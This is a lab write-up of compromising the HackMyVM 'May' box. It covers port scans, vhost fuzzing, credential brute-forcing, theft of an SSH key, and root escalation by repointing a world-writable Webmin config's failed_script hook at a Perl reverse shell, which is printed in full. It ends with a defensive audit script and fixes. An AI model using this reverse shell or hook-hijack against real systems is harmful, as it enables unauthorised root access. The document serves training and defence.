hack-my-vm-may


Port scan

kali@kali [~] ➜  sudo nmap -p- -sT --min-rate 1000 192.168.1.59                                                                                  [23:43:32]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-21 23:50 CST
Nmap scan report for may.hmv (192.168.1.59)
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10000/tcp open snet-sensor-mgmt
MAC Address: 08:00:27:C3:A8:CC (Oracle VirtualBox virtual NIC)

Three ports are open. Probe them in more depth with version detection and default scripts:

kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80,10000 192.168.1.59                                                                                [23:50:18]
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 00:08 CST
Nmap scan report for may.hmv (192.168.1.59)
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 94:fb:c0:76:f2:b3:ff:4a:ed:61:6a:ae:a1:ca:86:c1 (RSA)
| 256 d0:29:99:fd:69:68:21:e3:b4:a6:48:e4:4e:a1:7e:f4 (ECDSA)
|_ 256 2a:1b:1f:3d:ab:0a:00:5b:43:75:89:67:8a:98:21:df (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: MAY
10000/tcp open http MiniServ 1.979 (Webmin httpd)
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.979
MAC Address: 08:00:27:C3:A8:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So port 10000 is also an HTTP service: nmap identifies it from the Server header as Webmin (MiniServ 1.979), served over TLS.

Port 80

First add an entry to /etc/hosts. The reason is visible as soon as you request port 80 by IP: the site redirects to may.hmv, so the server cares about the Host name.

kali@kali [~] ➜  curl http://may.hmv/                                                                                                            [23:45:21]
<!doctype html>
<html lang="en">
<title>MAY</title>
<pre>
admin: Web is under construction. Use Intranet.
marie: Where are now the keys?
alice: Yes, where are?
admin: :'(
</pre>
</body>
</html>

The only useful information on the page is three usernames (admin, marie, alice). Note them down and move on to directory brute-forcing:

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://may.hmv/ -x txt,php,html         [23:46:13]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://may.hmv/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 194]
Progress: 882244 / 882248 (100.00%)
===============================================================
Finished
===============================================================

Directory brute-forcing finds nothing, so directories are not the way in. Next is subdomain (virtual host) brute-forcing: a site that only works once you add a hosts entry is a strong hint that name-based virtual hosts are in play, so this is always worth trying. Fuzz the Host header and hide the 185-character response that the default vhost returns:

kali@kali [~] ➜  wfuzz -w /home/kali/web_shell_toos/subdomains-top1million-5000.txt -u http://may.hmv -H "Host: FUZZ.may.hmv" --hh 185            [0:25:59]

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://may.hmv/
Total requests: 4989

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000048: 200 11 L 31 W 406 Ch "portal"
000000183: 200 10 L 31 W 405 Ch "ssh"

Total time: 10.66197
Processed Requests: 4989
Filtered Requests: 4987
Requests/sec.: 467.9245

Two hits. Add the new names to /etc/hosts as well. Visiting them shows a login form, so the two most direct things to try are weak credentials and SQL injection. Save the login POST request to a file and hand it to sqlmap:

kali@kali [~] ➜  sqlmap -r 1.txt                                                                                                                  [0:35:44]
___
__H__
___ ___[,]_____ ___ ___ {1.9#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:35:48 /2025-02-22/

[00:35:48] [INFO] parsing HTTP request from '1.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[00:35:50] [INFO] testing connection to the target URL
[00:35:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:35:50] [INFO] testing if the target URL content is stable
[00:35:51] [INFO] target URL content is stable
[00:35:51] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[00:35:51] [WARNING] (custom) POST parameter '#1*' does not appear to be dynamic
[00:35:51] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[00:35:51] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[00:35:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:35:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:35:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:35:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:35:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:35:51] [INFO] testing 'Generic inline queries'
[00:35:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:35:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:35:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:35:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:35:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[00:35:51] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[00:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:35:52] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[00:35:52] [INFO] testing if (custom) POST parameter '#2*' is dynamic
[00:35:52] [WARNING] (custom) POST parameter '#2*' does not appear to be dynamic
[00:35:52] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#2*' might not be injectable
[00:35:52] [INFO] testing for SQL injection on (custom) POST parameter '#2*'
[00:35:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:35:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:35:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:35:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:35:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:35:52] [INFO] testing 'Generic inline queries'
[00:35:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:35:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:35:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:35:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:35:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[00:35:52] [INFO] testing 'Oracle AND time-based blind'
[00:35:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:35:52] [WARNING] (custom) POST parameter '#2*' does not seem to be injectable
[00:35:52] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 00:35:52 /2025-02-22/

No injection there, so set that aside and brute-force weak credentials instead. That turns up a valid password.


Comparing the successful response with a failed one, the successful one carries an extra cookie with no obvious meaning:

Set-Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX

It presumably carries identity or session state. Replaying it against the pages found so far should reveal more: one is index.php, the other check.php, the path that the brute-forced login request posted to.


That yields an SSH private key. Save it to a file and derive the public key to confirm it is valid and see who it belongs to:

kali@kali [~] ➜  ssh-keygen -y -f x                                                                   [1:18:32]
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcfBDobru1KtzFM3ag4qmVVp7Rv6BV7TH9u0VKAYnLZsyhZzXioE6MTtwRw7y0QHzmYjd+0HKOnplVxBZ2YQW+oON6Ia+5y7Ryc7+RNhka57fj8/T7dMngOf3aUvmd54UkLfvIe2DEa/VdndpDqY39djqiQ+mOEQJmJ4fzzj0/69yWEGxdxk83BnW+RcCKdphPp7W8MkD3iXiKgOCP9LjyAW5HU4TGmzEz5zW6CAhx38aAXJUfLuL+F2bvynT2+eZaPyzDZdR3xcYgk5lEczHTEDDZ7OQcL3du7AvYpHF7P17mewsx8pRg0F3tP/XoB9LqVG+S8IE8AmxoE49vJw0p marie@may

The key has no passphrase, and the comment on the derived public key, marie@may, tells us which account it belongs to. Log in with it.

Privilege escalation

kali@kali [~] ➜  chmod 600 x                                                                            [1:28:09]
kali@kali [~] ➜ ssh -i x marie@192.168.1.59 [1:28:14]
Linux may 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 22 03:34:48 2021
marie@may:~$ whoami
marie
marie@may:~$ ls -la
total 36
drwxr-xr-x 4 marie marie 4096 Jul 22 2021 .
drwxr-xr-x 3 root root 4096 Jul 21 2021 ..
-rw-r--r-- 1 marie marie 220 Jul 21 2021 .bash_logout
-rw-r--r-- 1 marie marie 3526 Jul 21 2021 .bashrc
drwxr-xr-x 3 marie marie 4096 Jul 22 2021 .local
-rw-r--r-- 1 marie marie 807 Jul 21 2021 .profile
drwx------ 2 marie marie 4096 Jul 22 2021 .ssh
-rw------- 1 marie marie 16 Jul 22 2021 user.txt
-rw------- 1 marie marie 49 Jul 22 2021 .Xauthority
marie@may:~$ cat user.txt|base64
SE1WbWFyaWVpc3JlYmVsCg==

We never actually opened the service on port 10000 in a browser. nmap already identified it as Webmin (MiniServ 1.979), and visiting it confirms a Webmin login page. Before digging into it, check sudo:


marie@may:/etc/webmin$ sudo -l
Matching Defaults entries for marie on may:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marie may run the following commands on may:
(ALL) NOPASSWD: /usr/sbin/halt, /usr/sbin/reboot, /usr/sbin/poweroff

These are halt, reboot and poweroff, all ways of shutting the machine down. None of them gives a shell by itself, but reboot does restart every service from its on-disk configuration, which will matter shortly. Now look at how Webmin is installed:

marie@may:~$ find / -name "webmin" 2>/dev/null
/etc/init.d/webmin
/etc/pam.d/webmin
/etc/webmin
/etc/webmin/webmin
/usr/share/doc/webmin
/usr/share/webmin
/usr/share/webmin/bin/webmin
/usr/share/webmin/gray-theme/webmin
/usr/share/webmin/webmin
/usr/share/webmin/authentic-theme/images/modules/webmin
/usr/share/webmin/authentic-theme/images/favicons/webmin
/usr/bin/webmin
/run/lock/subsys/webmin
/var/webmin
marie@may:~$ cd /etc/webmin
marie@may:/etc/webmin$ ls
acl cluster-useradmin fetchmail installed.cache logrotate package-updates quota squid useradmin
adsl-client cluster-usermin filemin ipfilter lpadmin pam raid sshd usermin
ajaxterm cluster-webmin filter ipfw lvm pap reload start var-path
apache config firewall ipsec mailboxes passwd restart status version
at cpan firewall6 iscsi-client mailcap perl-path samba stop vgetty
backup-config cron firewalld iscsi-server man phpini sarg stunnel webalizer
bacula-backup custom first-install iscsi-target miniserv.conf postfix sendmail syslog webmin
bandwidth dfsadmin fsdump iscsi-tgtd miniserv.pem postgresql servers syslog-ng webmin.acl
bind8 dhcpd grub jabber miniserv.users ppp-client shell system-status webmincron
change-user dovecot heartbeat krb5 mon pptp-client shorewall tcpwrappers webminlog
cluster-copy exim htaccess-htpasswd ldap-client mount pptp-server shorewall6 telnet wuftpd
cluster-cron exports idmapd ldap-server mysql proc smart-status time xinetd
cluster-passwd fail2ban inetd ldap-useradmin net procmail smf tunnel
cluster-shell failed.pl init login.pl nis proftpd software uninstall.sh
cluster-software fdisk inittab logout.pl openslp qmailadmin spam updown
marie@may:/etc/webmin$ ls -la
total 536
drwxr-xr-x 116 root root 4096 Feb 21 11:01 .
drwxr-xr-x 74 root root 4096 Feb 21 10:21 ..
drwx--x--x 2 root bin 4096 Jul 22 2021 acl
drwx--x--x 2 root bin 4096 Jul 22 2021 adsl-client
drwx--x--x 2 root bin 4096 Jul 22 2021 ajaxterm
drwx--x--x 2 root bin 4096 Jul 22 2021 apache
drwx--x--x 2 root bin 4096 Jul 22 2021 at
drwx--x--x 2 root bin 4096 Jul 22 2021 backup-config
drwx--x--x 2 root bin 4096 Jul 22 2021 bacula-backup
drwx--x--x 2 root bin 4096 Jul 22 2021 bandwidth
drwx--x--x 2 root bin 4096 Jul 22 2021 bind8
drwx--x--x 2 root bin 4096 Jul 22 2021 change-user
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-copy
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-cron
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-passwd
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-shell
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-software
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-useradmin
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-usermin
drwx--x--x 2 root bin 4096 Jul 22 2021 cluster-webmin
-rw-r--r-- 1 root root 427 Jul 22 2021 config
drwx--x--x 2 root bin 4096 Jul 22 2021 cpan
drwx--x--x 2 root bin 4096 Jul 22 2021 cron
drwx--x--x 2 root bin 4096 Jul 22 2021 custom
drwx--x--x 2 root bin 4096 Jul 22 2021 dfsadmin
drwx--x--x 2 root bin 4096 Jul 22 2021 dhcpd
drwx--x--x 2 root bin 4096 Jul 22 2021 dovecot
drwx--x--x 2 root bin 4096 Jul 22 2021 exim
drwx--x--x 2 root bin 4096 Jul 22 2021 exports
drwx--x--x 2 root bin 4096 Jul 22 2021 fail2ban
-rwxr-xr-x 1 root root 496 Jul 22 2021 failed.pl
drwx--x--x 2 root bin 4096 Jul 22 2021 fdisk
drwx--x--x 2 root bin 4096 Jul 22 2021 fetchmail
drwx--x--x 2 root bin 4096 Jul 22 2021 filemin
drwx--x--x 2 root bin 4096 Jul 22 2021 filter
drwx--x--x 2 root bin 4096 Jul 22 2021 firewall
drwx--x--x 2 root bin 4096 Jul 22 2021 firewall6
drwx--x--x 2 root bin 4096 Jul 22 2021 firewalld
-rw-r--r-- 1 root root 14 Jul 22 2021 first-install
drwx--x--x 2 root bin 4096 Jul 22 2021 fsdump
drwx--x--x 2 root bin 4096 Jul 22 2021 grub
drwx--x--x 2 root bin 4096 Jul 22 2021 heartbeat
drwx--x--x 2 root bin 4096 Jul 22 2021 htaccess-htpasswd
drwx--x--x 2 root bin 4096 Jul 22 2021 idmapd
drwx--x--x 2 root bin 4096 Jul 22 2021 inetd
drwx--x--x 2 root bin 4096 Jul 22 2021 init
drwx--x--x 2 root bin 4096 Jul 22 2021 inittab
-rw-r--r-- 1 root root 1174 Jul 22 2021 installed.cache
drwx--x--x 2 root bin 4096 Jul 22 2021 ipfilter
drwx--x--x 2 root bin 4096 Jul 22 2021 ipfw
drwx--x--x 2 root bin 4096 Jul 22 2021 ipsec
drwx--x--x 2 root bin 4096 Jul 22 2021 iscsi-client
drwx--x--x 2 root bin 4096 Jul 22 2021 iscsi-server
drwx--x--x 2 root bin 4096 Jul 22 2021 iscsi-target
drwx--x--x 2 root bin 4096 Jul 22 2021 iscsi-tgtd
drwx--x--x 2 root bin 4096 Jul 22 2021 jabber
drwx--x--x 2 root bin 4096 Jul 22 2021 krb5
drwx--x--x 2 root bin 4096 Jul 22 2021 ldap-client
drwx--x--x 2 root bin 4096 Jul 22 2021 ldap-server
drwx--x--x 2 root bin 4096 Jul 22 2021 ldap-useradmin
-rwxr-xr-x 1 root root 494 Jul 22 2021 login.pl
-rwxr-xr-x 1 root root 496 Jul 22 2021 logout.pl
drwx--x--x 2 root bin 4096 Jul 22 2021 logrotate
drwx--x--x 2 root bin 4096 Jul 22 2021 lpadmin
drwx--x--x 2 root bin 4096 Jul 22 2021 lvm
drwx--x--x 2 root bin 4096 Jul 22 2021 mailboxes
drwx--x--x 2 root bin 4096 Jul 22 2021 mailcap
drwx--x--x 2 root bin 4096 Jul 22 2021 man
-rw----rw- 1 root bin 979 Feb 21 11:01 miniserv.conf
-rw------- 1 root bin 2957 Jul 22 2021 miniserv.pem
-rw------- 1 root bin 9 Jul 22 2021 miniserv.users
drwx--x--x 2 root bin 4096 Jul 22 2021 mon
drwx--x--x 2 root bin 4096 Jul 22 2021 mount
drwx--x--x 2 root bin 4096 Jul 22 2021 mysql
drwx--x--x 2 root bin 4096 Jul 22 2021 net
drwx--x--x 2 root bin 4096 Jul 22 2021 nis
drwx--x--x 2 root bin 4096 Jul 22 2021 openslp
drwx--x--x 2 root bin 4096 Jul 22 2021 package-updates
drwx--x--x 2 root bin 4096 Jul 22 2021 pam
drwx--x--x 2 root bin 4096 Jul 22 2021 pap
drwx--x--x 2 root bin 4096 Jul 22 2021 passwd
-rw-r--r-- 1 root root 14 Jul 22 2021 perl-path
drwx--x--x 2 root bin 4096 Jul 22 2021 phpini
drwx--x--x 2 root bin 4096 Jul 22 2021 postfix
drwx--x--x 2 root bin 4096 Jul 22 2021 postgresql
drwx--x--x 2 root bin 4096 Jul 22 2021 ppp-client
drwx--x--x 2 root bin 4096 Jul 22 2021 pptp-client
drwx--x--x 2 root bin 4096 Jul 22 2021 pptp-server
drwx--x--x 2 root bin 4096 Jul 22 2021 proc
drwx--x--x 2 root bin 4096 Jul 22 2021 procmail
drwx--x--x 2 root bin 4096 Jul 22 2021 proftpd
drwx--x--x 2 root bin 4096 Jul 22 2021 qmailadmin
drwx--x--x 2 root bin 4096 Jul 22 2021 quota
drwx--x--x 2 root bin 4096 Jul 22 2021 raid
-rwxr-xr-x 1 root root 164 Jul 22 2021 reload
-rwxr-xr-x 1 root root 55 Jul 22 2021 restart
drwx--x--x 2 root bin 4096 Jul 22 2021 samba
drwx--x--x 2 root bin 4096 Jul 22 2021 sarg
drwx--x--x 2 root bin 4096 Jul 22 2021 sendmail
drwx--x--x 2 root bin 4096 Jul 22 2021 servers
drwx--x--x 2 root bin 4096 Jul 22 2021 shell
drwx--x--x 2 root bin 4096 Jul 22 2021 shorewall
drwx--x--x 2 root bin 4096 Jul 22 2021 shorewall6
drwx--x--x 2 root bin 4096 Jul 22 2021 smart-status
drwx--x--x 2 root bin 4096 Jul 22 2021 smf
drwx--x--x 2 root bin 4096 Jul 22 2021 software
drwx--x--x 2 root bin 4096 Jul 22 2021 spam
drwx--x--x 2 root bin 4096 Jul 22 2021 squid
drwx--x--x 2 root bin 4096 Jul 22 2021 sshd
-rwxr-xr-x 1 root root 234 Jul 22 2021 start
drwx--x--x 2 root bin 4096 Jul 22 2021 status
-rwxr-xr-x 1 root root 359 Jul 22 2021 stop
drwx--x--x 2 root bin 4096 Jul 22 2021 stunnel
drwx--x--x 2 root bin 4096 Jul 22 2021 syslog
drwx--x--x 2 root bin 4096 Jul 22 2021 syslog-ng
drwx--x--x 2 root bin 4096 Jul 22 2021 system-status
drwx--x--x 2 root bin 4096 Jul 22 2021 tcpwrappers
drwx--x--x 2 root bin 4096 Jul 22 2021 telnet
drwx--x--x 2 root bin 4096 Jul 22 2021 time
drwx--x--x 2 root bin 4096 Jul 22 2021 tunnel
-rwxr-xr-x 1 root root 198 Jul 22 2021 uninstall.sh
drwx--x--x 2 root bin 4096 Jul 22 2021 updown
drwx--x--x 2 root bin 4096 Jul 22 2021 useradmin
drwx--x--x 2 root bin 4096 Jul 22 2021 usermin
-rw-r--r-- 1 root root 12 Jul 22 2021 var-path
-rw-r--r-- 1 root root 6 Jul 22 2021 version
drwx--x--x 2 root bin 4096 Jul 22 2021 vgetty
drwx--x--x 2 root bin 4096 Jul 22 2021 webalizer
drwx--x--x 2 root bin 4096 Jul 22 2021 webmin
-rw------- 1 root root 997 Jul 22 2021 webmin.acl
drwx--x--x 3 root bin 4096 Jul 22 2021 webmincron
drwx--x--x 2 root bin 4096 Jul 22 2021 webminlog
drwx--x--x 2 root bin 4096 Jul 22 2021 wuftpd
drwx--x--x 2 root bin 4096 Jul 22 2021 xinetd

One file stands out: miniserv.conf is -rw----rw- root:bin, i.e. writable by everyone on the box, including marie. And Webmin itself runs as root:

root      1016   556  0 12:27 ?        00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root      1017   556  0 12:27 ?        00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
marie@may:/etc/webmin$ cat miniserv.conf
port=10000
root=/usr/share/webmin
mimetypes=/usr/share/webmin/mime.types
addtype_cgi=internal/cgi
realm=Webmin Server
logfile=/var/webmin/miniserv.log
errorlog=/var/webmin/miniserv.error
pidfile=/var/webmin/miniserv.pid
logtime=168
ssl=1
no_ssl2=1
no_ssl3=1
no_tls1=1
no_tls1_1=1
ssl_honorcipherorder=1
no_sslcompression=1
env_WEBMIN_CONFIG=/etc/webmin
env_WEBMIN_VAR=/var/webmin
atboot=1
logout=/etc/webmin/logout-flag
listen=10000
denyfile=\.pl$
log=1
blockhost_failures=5
blockhost_time=60
syslog=1
ipv6=1
session=1
premodules=WebminCore
server=MiniServ/1.979
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
passwd_uindex=0
passwd_pindex=1
passwd_cindex=2
passwd_mindex=4
passwd_mode=0
preroot=authentic-theme
passdelay=1
failed_script=/etc/webmin/failed.pl
logout_script=/etc/webmin/logout.pl
cipher_list_def=1
login_script=/etc/webmin/login.pl
sudo=1
error_handler_403=403.cgi
error_handler_404=404.cgi
error_handler_401=401.cgi

In this writable config, failed_script is the script miniserv executes every time a login fails (login_script and logout_script are the equivalent hooks for a successful login and a logout). Since miniserv runs as root, whatever that path points at runs as root. So: write a reverse-shell script, make it executable, change the failed_script= line so that it points at our script instead of /etc/webmin/failed.pl, restart Webmin so it re-reads miniserv.conf (the sudo reboot we are allowed to run does that, and atboot=1 brings Webmin back up), and with a listener ready deliberately fail one login on https://may.hmv:10000/. Note that 1.pl, despite its name, is a shell one-liner that invokes perl; it ran as-is here, but a #!/bin/sh shebang would make that unambiguous.

marie@may:~$ cat 1.pl 
perl -e 'use Socket;$i="192.168.1.5";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
marie@may:~$ chmod +x 1.pl
marie@may:~$ nano /etc/webmin/miniserv.conf
marie@may:~$ sudo /usr/sbin/reboot


kali@kali [~] ➜  nc -lvnp 8888                                                          [1:42:33]
listening on [any] 8888 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.59] 40070
bash: cannot set terminal process group (389): Inappropriate ioctl for device
bash: no job control in this shell
root@may:/usr/share/webmin# id
id
uid=0(root) gid=0(root) groups=0(root)
root@may:/usr/share/webmin#
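The root cause of this escalation is a root-run service whose configuration file, and through it its *_script hooks, can be modified by an unprivileged user. The POSIX shell script below is an added example, written for this writeup rather than taken from the original post or from Webmin itself: it audits a miniserv.conf for exactly the two conditions seen on this box (config writable by group/other; a failed_script/login_script/logout_script target that is missing, not owned by the service user, or writable by others). It assumes GNU coreutils stat (-c); the config path and the expected owner (root by default, since that is what miniserv runs as here) are arguments, and the sample config in the usage comment is constructed.

```shell
#!/bin/sh
# Added example (not from the original writeup, not Webmin's own code): audit a
# Webmin miniserv.conf for the two weaknesses that chained into root on this box:
#   1. the config file itself is writable by group/other (here -rw----rw- root:bin);
#   2. a *_script hook (failed_script / login_script / logout_script) points at a
#      file that is missing, not owned by the service user, or writable by others.
# miniserv.pl runs these hooks as the user it runs as (root here), so whoever can
# write the config or the hook target gets code execution as that user.
# Assumes GNU coreutils stat (-c). All paths are arguments; nothing is hard-coded.

# only_owner_writable PATH -> 0 if neither group nor other has the write bit
only_owner_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    perm=$(printf '%03d' "$mode" | tail -c 3)   # drop any setuid/setgid/sticky digit
    g=$(printf '%s' "$perm" | cut -c2)
    o=$(printf '%s' "$perm" | cut -c3)
    [ $((g & 2)) -eq 0 ] && [ $((o & 2)) -eq 0 ]
}

# conf_value CONF KEY -> value of the first "KEY=value" line, empty if absent
conf_value() {
    awk -F= -v k="$2" '$1 == k { print substr($0, length(k) + 2); exit }' "$1"
}

# audit_miniserv_conf CONF [OWNER]
# Prints one FINDING line per problem and returns the number of findings
# (0 means clean). OWNER is the account miniserv runs as; default root.
audit_miniserv_conf() {
    conf=$1
    owner=${2:-root}
    findings=0

    if ! only_owner_writable "$conf"; then
        echo "FINDING: $conf is writable by group/other: $(stat -c '%A %U:%G' "$conf")"
        findings=$((findings + 1))
    fi

    # every hook miniserv will exec must exist, belong to the service user,
    # and be writable by nobody else
    for key in failed_script login_script logout_script; do
        target=$(conf_value "$conf" "$key")
        [ -n "$target" ] || continue
        if [ ! -e "$target" ]; then
            echo "FINDING: $key=$target does not exist"
            findings=$((findings + 1))
        elif [ "$(stat -c '%U' "$target")" != "$owner" ] || ! only_owner_writable "$target"; then
            echo "FINDING: $key=$target is $(stat -c '%A %U:%G' "$target"); expected owner $owner with no group/other write"
            findings=$((findings + 1))
        fi
    done
    return $findings
}

# usage (on the target, as any user who can read the file):
#   audit_miniserv_conf /etc/webmin/miniserv.conf
# On this box it reports the world-writable config. A constructed clean fragment
# would be: "port=10000\nfailed_script=/etc/webmin/failed.pl\n" in a 0600 root file.
```

Run it from the foothold shell before reaching for an exploit: a world-writable miniserv.conf, or a hook target you can write, is the whole finding. The fix on the defending side is equally short: chmod 600 the config, keep the hook scripts root-owned and non-writable, and treat any *_script line in miniserv.conf as privileged code.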